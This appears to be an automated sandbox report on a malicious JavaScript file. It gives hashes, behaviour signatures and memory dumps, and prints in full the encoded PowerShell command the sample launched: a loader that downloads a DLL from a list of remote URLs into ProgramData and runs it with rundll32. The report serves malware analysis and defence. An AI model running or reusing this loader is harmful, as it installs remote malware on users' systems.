7e75618cb79d8ea693661e9b688a077803ae56c978906726caa0d3bf144b235e

General

Target

entry_1_0/fDLgDMCPB1xMzA.js
Size

287KB
MD5

b46cdff4f6c28961b93c07a47a842bc1
SHA1

742f1ec9627a4109d8c4ad4d6d6d3424422e7895
SHA256

5e1d962deec9ec1522005d79c988d04bddea4572135013a075a29ebfeedc55d6
SHA512

a9fff91da944d6597b1393c84e70f1ba8aaacd4ca76f246c62cdcbb16ce233373941c000b1ed21f09d21e8a6c6812ab19ea2fa9b6b7da4f14dc5ed69ae9e4d39
SSDEEP

6144:bSfr0dh2tgcH6YTkM0cNRcpZwg/EBQ+8N/ygD1pRbEZ8HacPaPtZg3WSiTIhS:bSfrSh2tgcH6YTkMXRcpZwg/QQ+I/ygk

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2036	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2036	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 1900 wrote to memory of 2036	1900	wscript.exe	26
PID 1900 wrote to memory of 2036	1900	wscript.exe	26
PID 1900 wrote to memory of 2036	1900	wscript.exe	26

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\entry_1_0\fDLgDMCPB1xMzA.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1900
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABFAHAAaQB0AGgAZQB0AGkAYwBpAGEAbgBDAHUAYgBhAHQAdQByAGUAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMgBBAEQAawBBAEwAZwBBAHgAQQBEAE0AQQBPAEEAQQB1AEEARABJAEEATQBnAEEAdwBBAEMANABBAE4AQQBBAHgAQQBDADgAQQBiAHcAQgAzAEEAQwA4AEEAWgBBAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE0AZwBBAHUAQQBEAEkAQQBNAHcAQQB3AEEAQwA0AEEATwBBAEEANQBBAEMANABBAE0AZwBBAHoAQQBEAEUAQQBMAHcAQgB6AEEAQwA4AEEAUwBRAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHgAQQBEAEUAQQBNAHcAQQB2AEEARwBvAEEATgBBAEIAVQBBAEcAbwBBAGEAZwBCAHYAQQBEAFEAQQBMAHcAQgBJAEEARwBNAEEATQBnAEIAcQBBAEYAawBBAE4AQQBCAFYAQQBBAD0APQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBCAEoAQQBIAFEAQQBRAHcAQgBMAEEARQBjAEEATgBBAEEAPQBPAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQgBtAEEARABZAEEAZQBBAEIAUwBBAEYAVQBBAFkAZwBBAHkAQQBEAEEAQQBjAGcAQQB3AEEAQQA9AD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQASQBuAHMAaQBuAHUAYQBuAHQAIABpAG4AIAAkAEUAcABpAHQAaABlAHQAaQBjAGkAYQBuAEMAdQBiAGEAdAB1AHIAZQBzACAALQBzAHAAbABpAHQAIAAiAE8AIgApACAAewB0AHIAeQAgAHsAJABkAGUAcgBpAHYAZQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEkAbgBzAGkAbgB1AGEAbgB0ACkAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgACQAZABlAHIAaQB2AGUAcgAgAC0ATwAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABwAG8AawBlAHIAaQBzAGgAbAB5AC4AZABsAGwAOwAkAHMAdABlAHIAYwBvAHAAaABhAGcAbwB1AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAEEAQQB4AEEAQwA0AEEATQBnAEEAdwBBAEQAWQBBAEwAZwBBAHkAQQBEAEUAQQBPAFEAQQB1AEEARABFAEEATwBRAEEAdwBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgByAEEARwBFAEEAYgBRAEIAaABBAEcATQBBAGEAQQBCAHAAQQBHAHcAQQBaAFEAQQB1AEEASABRAEEAYgB3AEIANQBBAEgATQBBAHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATQBBAEEAdQBBAEQARQBBAE4AQQBBADMAQQBDADQAQQBNAGcAQQB6AEEARABVAEEATABnAEEAeQBBAEQATQBBAE0AdwBBAD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAcABvAGsAZQByAGkAcwBoAGwAeQAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANQA2ADAAMgA0ACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgB3AEEARwA4AEEAYQB3AEIAbABBAEgASQBBAGEAUQBCAHoAQQBHAGcAQQBiAEEAQgA1AEEAQwA0AEEAWgBBAEIAcwBBAEcAdwBBAEwAQQBCAHQAQQBIAFUAQQBjAHcAQgAwAEEARABzAEEAIgA7ACQAUwBxAHUAaQByAHIAZQBsAGwAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEkAQQBNAEEAQQB4AEEAQwA0AEEATQBRAEEAeQBBAEQAVQBBAEwAZwBBAHgAQQBEAEUAQQBOAGcAQQB1AEEARABJAEEATQB3AEEAMABBAEEAPQA9ACIAOwAkAHAAbwB1AGwAdAByAHkAbQBhAG4AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBNAHcAQQB1AEEARABFAEEATQBnAEEAMgBBAEMANABBAE0AZwBBADAAQQBEAGsAQQBMAGcAQQAxAEEARABRAEEARgB4AHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABVAEEAYwB3AEIAeABBAEgAVQBBAFoAUQBCAGkAQQBHAEUAQQBkAFEAQgBuAEEARwBnAEEAUgBnAEIAdgBBAEgASQBBAGMAdwBCAGgAQQBHAHMAQQBhAFEAQgB1AEEARwBjAEEATABnAEIAdwBBAEgAVQBBAFkAZwBBAD0ARgB4AHEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBnAEEAeABBAEMANABBAE4AQQBBADIAQQBDADQAQQBPAEEAQQAwAEEAQwA0AEEATQBRAEEAMwBBAEQAZwBBACIAOwAkAGMAcgBvAHAAcABlAGQAVgBlAG4AbwBhAHUAcgBpAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAbwBBAEcAOABBAGQAUQBCAGsAQQBHAEUAQQBiAGcAQgBCAEEASABNAEEAYwB3AEIAaABBAEcAYwBBAFkAUQBCAHAAQQBDADQAQQBZAHcAQgB2AEEARwA4AEEAYQB3AEIAcABBAEcANABBAFoAdwBBAD0AegBRAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBAHkAQQBDADQAQQBNAGcAQQB3AEEARABrAEEATABnAEEAMQBBAEQATQBBAHoAUQBHAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADQAQQBDADQAQQBNAFEAQQB6AEEARABBAEEATABnAEEAeQBBAEQASQBBAE0AdwBBAHUAQQBEAEUAQQBPAFEAQQB3AEEAQQA9AD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2036

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2036-58-0x00000000023D0000-0x0000000002450000-memory.dmp

Filesize
512KB

Download
memory/2036-59-0x000000001B320000-0x000000001B602000-memory.dmp

Filesize
2.9MB

Download
memory/2036-60-0x0000000001F40000-0x0000000001F48000-memory.dmp

Filesize
32KB

Download
memory/2036-61-0x00000000023D4000-0x00000000023D7000-memory.dmp

Filesize
12KB

Download
memory/2036-62-0x00000000023DB000-0x0000000002412000-memory.dmp

Filesize
220KB

Download

Analysis

Sharing